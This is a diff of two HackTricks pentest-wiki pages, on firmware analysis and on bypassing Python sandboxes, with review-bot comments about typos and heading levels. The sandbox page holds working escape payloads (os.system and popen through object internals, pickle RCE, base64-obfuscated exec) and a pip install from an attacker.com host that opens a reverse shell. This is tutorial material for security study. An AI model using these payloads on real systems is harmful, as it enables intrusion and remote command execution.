{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %} {% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
# Courses ## Courses
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)

@ -1,4 +1,4 @@
# Firmware Analysis
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Introduction
# Introduction
Firmware is a type of software that provides communication and control over a devices hardware components. Its the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware. Firmware is a type of software that provides communication and control over a devices hardware components. Its the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware.
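Review bot: possessives in the introduction are missing their apostrophes: "a devices hardware components" and "Its the first piece of code" should be "device's" and "It's" (unless the curly apostrophes were dropped by the renderer, in which case plain ASCII `'` avoids the problem).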
@ -25,7 +24,7 @@ Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash m
Its important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process. Its important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process.
# **Information gathering and reconnaissance** ## **Information gathering and reconnaissance**
During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following: During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following:
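Review bot: "Its important to **examine**" needs its apostrophe ("It's"), and "to understand its overall composition underlying technology" is missing a conjunction: "its overall composition and underlying technology".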
@ -47,7 +46,7 @@ During this stage, collect as much information about the target as possible to u
Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmles LGTM](https://lgtm.com/#explore). Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmles LGTM](https://lgtm.com/#explore).
# Getting the Firmware ## Getting the Firmware
There are different ways with different difficulty levels to download the firmware There are different ways with different difficulty levels to download the firmware
@ -66,7 +65,7 @@ There are different ways with different difficulty levels to download the firmwa
* Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT). * Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT).
* You will need a supported chip programmer for flash storage and/or the MCU. * You will need a supported chip programmer for flash storage and/or the MCU.
# Analyzing the firmware ## Analyzing the firmware
Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that: Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that:
@ -83,18 +82,18 @@ If you don't find much with those tools check the **entropy** of the image with
Moreover, you can use these tools to extract **files embedded inside the firmware**: Moreover, you can use these tools to extract **files embedded inside the firmware**:
{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %} {% endcontent-ref %}
Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file. Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
## Getting the Filesystem ### Getting the Filesystem
With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\ With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\
Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs. Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
### Manual Filesystem Extraction #### Manual Filesystem Extraction
Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below. Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below.
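Review bot: the content-ref and link in this hunk now point at `../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md`; since the target directory moved, verify the file actually exists at that path and that the `../../` depth still resolves from this page's own directory, otherwise GitBook renders a dead card. While the line is being touched, "With the previous commented tools" would read better as "With the tools mentioned above".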
@ -146,7 +145,7 @@ Files will be in "`squashfs-root`" directory afterwards.
`$ ubidump.py <bin>` `$ ubidump.py <bin>`
## Analyzing the Filesystem ### Analyzing the Filesystem
Now that you have the filesystem is time to start looking for bad practices such as: Now that you have the filesystem is time to start looking for bad practices such as:
@ -199,7 +198,7 @@ Inside the filesystem you can also find **source code** of programs (that you sh
Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity). Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity).
{% endhint %} {% endhint %}
# Emulating Firmware ## Emulating Firmware
The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**. The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**.
@ -207,11 +206,11 @@ The idea to emulate the Firmware is to be able to perform a **dynamic analysis**
At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target. At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target.
{% endhint %} {% endhint %}
## Binary Emulation ### Binary Emulation
If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled. If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled.
### MIPS example #### MIPS example
```bash ```bash
file ./squashfs-root/bin/busybox file ./squashfs-root/bin/busybox
@ -231,7 +230,7 @@ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls
100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0 100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0
``` ```
### ARM Example #### ARM Example
```bash ```bash
file bin/busybox file bin/busybox
@ -245,7 +244,7 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0 1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0
``` ```
## Full System Emulation ### Full System Emulation
There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware: There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware:
@ -257,7 +256,7 @@ There are several tools, based in **qemu** in general, that will allow you to em
* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) * [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)
* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) * [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool)
# **Dynamic analysis** ## **Dynamic analysis**
In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**. In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**.
@ -283,7 +282,7 @@ You should test if the device is doing any kind of **firmware integrity tests**,
Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications. Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications.
# **Runtime analysis** ## **Runtime analysis**
Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below: Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below:
@ -305,7 +304,7 @@ Tools that may be helpful are (non-exhaustive):
* Binary Ninja * Binary Ninja
* Hopper * Hopper
# **Binary Exploitation** ## **Binary Exploitation**
After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory. After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory.
@ -316,12 +315,12 @@ Utilize the following references for further guidance:
* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/) * [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/)
* [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/) * [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
# Prepared OSs to analyze Firmware ## Prepared OSs to analyze Firmware
* [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. * [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded.
* [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. * [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools.
# Vulnerable firmware to practice ## Vulnerable firmware to practice
To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point. To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point.
@ -338,16 +337,15 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
* Damn Vulnerable IoT Device (DVID) * Damn Vulnerable IoT Device (DVID)
* [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID) * [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
# References ## References
* [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) * [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904) * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
# Trainning and Cert ## Trainning and Cert
* [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation) * [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
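Review bot: the heading `## Trainning and Cert` keeps the "Trainning" typo through the level change; since the line is already being rewritten, correct it to `## Training and Certifications` so the section title is spelled properly in the new file.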
@ -363,5 +361,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Bypass Python sandboxes
<details> <details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
These are some tricks to bypass python sandbox protections and execute arbitrary commands. These are some tricks to bypass python sandbox protections and execute arbitrary commands.
# Command Execution Libraries ## Command Execution Libraries
The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries: The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
@ -66,9 +65,9 @@ Python try to **load libraries from the current directory first** (the following
![](<../../../.gitbook/assets/image (552).png>) ![](<../../../.gitbook/assets/image (552).png>)
# Bypass pickle sandbox with default installed python packages ## Bypass pickle sandbox with default installed python packages
## Default packages ### Default packages
You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\ You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\ Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
@ -89,7 +88,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0)))
For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
## Pip package ### Pip package
Trick shared by **@isHaacK** Trick shared by **@isHaacK**
@ -102,13 +101,13 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
{% file src="../../../.gitbook/assets/reverse.tar.gz" %} {% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
{% hint style="info" %} {% hint style="info" %}
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
{% endhint %} {% endhint %}
# Eval-ing python code ## Eval-ing python code
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction: This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
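Review bot: the `{% file src=... %}` line changes only the case of the asset name (`reverse.tar.gz` to `Reverse.tar.gz`); confirm the file under `.gitbook/assets` really is committed with a capital R, because the lookup is case-sensitive on Linux-hosted builds and a mismatch breaks the download card. The surrounding hint text also needs a space after the period in "called `Reverse`.However," while this block is being edited.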
@ -133,7 +132,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
``` ```
# Builtins ## Builtins
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
@ -145,7 +144,7 @@ __builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls") __builtins__.__dict__['__import__']("os").system("ls")
``` ```
## No Builtins ### No Builtins
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\ When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**. However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
@ -175,7 +174,7 @@ import __builtin__
get_flag.__globals__['__builtins__']['__import__']("os").system("ls") get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
``` ```
### Python3 #### Python3
```python ```python
# Obtain builtins from a globally defined function # Obtain builtins from a globally defined function
@ -194,7 +193,7 @@ get_flag.__globals__['__builtins__']
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**. [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
### Python2 and Python3 #### Python2 and Python3
```python ```python
# Recover __builtins__ and make eveything easier # Recover __builtins__ and make eveything easier
@ -202,7 +201,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__
__builtins__["__import__"]('os').system('ls') __builtins__["__import__"]('os').system('ls')
``` ```
## Builtins payloads ### Builtins payloads
```python ```python
# Possible payloads once you have found the builtins # Possible payloads once you have found the builtins
@ -212,7 +211,7 @@ __builtins__["__import__"]('os').system('ls')
# See them below # See them below
``` ```
# Globals and locals ## Globals and locals
Checking the **`globals`** and **`locals`** is a good way to know what you can access. Checking the **`globals`** and **`locals`** is a good way to know what you can access.
@ -242,11 +241,11 @@ class_obj.__init__.__globals__
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**. [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
# Discover Arbitrary Execution ## Discover Arbitrary Execution
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits. Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
### Accessing subclasses with bypasses #### Accessing subclasses with bypasses
One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**: One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**:
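Review bot: `#### Accessing subclasses with bypasses` skips a heading level, since its parent `## Discover Arbitrary Execution` is H2 and the sibling section `### Finding dangerous libraries loaded` in the next hunk is H3; demote it to `###` instead so the outline stays consistent. The context line above also reads "places were you can find" where "where" is meant.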
@ -275,7 +274,7 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
``` ```
## Finding dangerous libraries loaded ### Finding dangerous libraries loaded
For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**: For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**:
@ -383,7 +382,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
""" """
``` ```
# Recursive Search of Builtins, Globals... ## Recursive Search of Builtins, Globals...
{% hint style="warning" %} {% hint style="warning" %}
This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.** This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.**
@ -511,7 +510,7 @@ You can check the output of this script in this page:
[output-searching-python-internals.md](output-searching-python-internals.md) [output-searching-python-internals.md](output-searching-python-internals.md)
{% endcontent-ref %} {% endcontent-ref %}
# Python Format String ## Python Format String
If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example. If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
@ -566,7 +565,7 @@ class HAL9000(object):
**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) **More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)
## Sensitive Information Disclosure Payloads ### Sensitive Information Disclosure Payloads
```python ```python
{whoami.__class__.__dict__} {whoami.__class__.__dict__}
@ -579,7 +578,7 @@ class HAL9000(object):
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
``` ```
# Dissecting Python Objects ## Dissecting Python Objects
{% hint style="info" %} {% hint style="info" %}
If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
@ -600,7 +599,7 @@ def get_flag(some_input):
return "Nope" return "Nope"
``` ```
### dir #### dir
```python ```python
dir() #General dir() to find what we have loaded dir() #General dir() to find what we have loaded
@ -609,7 +608,7 @@ dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
``` ```
### globals #### globals
`__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared: `__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
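Review bot: `#### globals` here, and `#### dir` in the preceding hunk, are rendered at H4 directly under `## Dissecting Python Objects` while the following sibling `### **Accessing the function code**` is H3; use `### dir` and `### globals` so the sub-sections of this part sit at one level. On the context line, a space is missing in "`func_globals`(Same)".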
@ -624,7 +623,7 @@ CustomClassObject.__class__.__init__.__globals__
[**See here more places to obtain globals**](./#globals-and-locals) [**See here more places to obtain globals**](./#globals-and-locals)
## **Accessing the function code** ### **Accessing the function code**
**`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function. **`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function.
@ -642,7 +641,7 @@ dir(get_flag.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
``` ```
## Getting Code Information ### Getting Code Information
```python ```python
# Another example # Another example
@ -690,7 +689,7 @@ get_flag.__code__.co_code
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
``` ```
## **Disassembly a function** ### **Disassembly a function**
```python ```python
import dis import dis
@ -744,7 +743,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
47 RETURN_VALUE 47 RETURN_VALUE
``` ```
# Compiling Python ## Compiling Python
Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\ Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_) Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
@ -762,7 +761,7 @@ def get_flag(some_input):
return "Nope" return "Nope"
``` ```
## Creating the code object ### Creating the code object
First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked: First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked:
@ -795,7 +794,7 @@ types.CodeType.__doc__
``` ```
{% endhint %} {% endhint %}
## Recreating a leaked function ### Recreating a leaked function
{% hint style="warning" %} {% hint style="warning" %}
In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**. In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
@ -812,7 +811,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag #ThisIsTheFlag
``` ```
## Bypass Defenses ### Bypass Defenses
In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\ In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF). Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF).
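Review bot: two wording defects in the context lines of this hunk: "at the begging of this post" should read "at the beginning of this post", and "we don't have the `compiled` function in the CTF" should name the builtin the previous sentence refers to, i.e. "we don't have the `compile` function in the CTF". The `###` demotion of "Bypass Defenses" is consistent with the other subsection headings demoted in this file.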
@ -856,19 +855,19 @@ f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdi
f(42) f(42)
``` ```
# Decompiling Compiled Python ## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code. Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
**Check out this tutorial**: **Check out this tutorial**:
